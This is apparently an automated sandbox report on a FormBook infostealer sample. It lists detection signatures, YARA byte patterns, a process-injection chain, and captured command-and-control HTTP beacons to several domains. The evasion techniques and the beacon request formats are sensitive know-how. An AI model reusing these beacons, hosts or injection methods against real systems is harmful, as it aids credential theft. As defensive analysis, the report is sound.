Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report NQQWym075C.exe

Overview

General Information

Sample Name:NQQWym075C.exe
Analysis ID:321308
MD5:bf75ed61e1b1f7b310ec1d999077c4dd
SHA1:cdced77e176e38ff459cdea08941de26861647cd
SHA256:69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NQQWym075C.exe (PID: 5264 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
    • RegAsm.exe (PID: 5368 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 1844 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 808 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cscript.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
    • NQQWym075C.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
      • RegAsm.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16679:$sqlite3step: 68 34 1C 7B E1
    • 0x1678c:$sqlite3step: 68 34 1C 7B E1
    • 0x166a8:$sqlite3text: 68 38 2A 90 C5
    • 0x167cd:$sqlite3text: 68 38 2A 90 C5
    • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.RegAsm.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.RegAsm.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16679:$sqlite3step: 68 34 1C 7B E1
        • 0x1678c:$sqlite3step: 68 34 1C 7B E1
        • 0x166a8:$sqlite3text: 68 38 2A 90 C5
        • 0x167cd:$sqlite3text: 68 38 2A 90 C5
        • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RegAsm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: NQQWym075C.exeVirustotal: Detection: 30%Perma Link
          Source: NQQWym075C.exeReversingLabs: Detection: 48%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: NQQWym075C.exeJoe Sandbox ML: detected
          Source: 2.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49728
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49731
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 35.186.238.101:80 -> 192.168.2.3:49744
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49745
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.186.238.101 35.186.238.101
          Source: Joe Sandbox ViewIP Address: 198.49.23.141 198.49.23.141
          Source: Joe Sandbox ViewIP Address: 23.227.38.64 23.227.38.64
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ussouthernhome.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:14:52 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:03:34 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: explorer.exe, 00000003.00000000.252651061.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmpString found in binary or memory: http://www.sz360buy.com/d
          Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmpString found in binary or memory: http://www.sz360buy.com/o56q/?6l=2CtK5nvmO
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000006.00000002.489818929.0000000003DA2000.00000004.00000001.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
